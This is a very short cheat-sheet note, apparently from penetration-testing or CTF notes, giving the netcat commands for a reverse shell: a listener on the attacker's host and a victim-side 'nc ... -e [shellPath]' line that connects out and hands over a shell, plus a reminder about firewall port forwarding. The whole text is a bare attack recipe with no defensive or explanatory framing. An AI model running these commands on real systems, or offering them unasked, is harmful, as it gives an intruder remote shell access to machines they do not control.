- typically the way we start/catch reverse shells ## On the host machine `nc -lvp [anyport]` ## victim `nc [ipToHost] [port listening on] -e [shellPath] ` **make sure correct port forwarding rules are in place on firewall**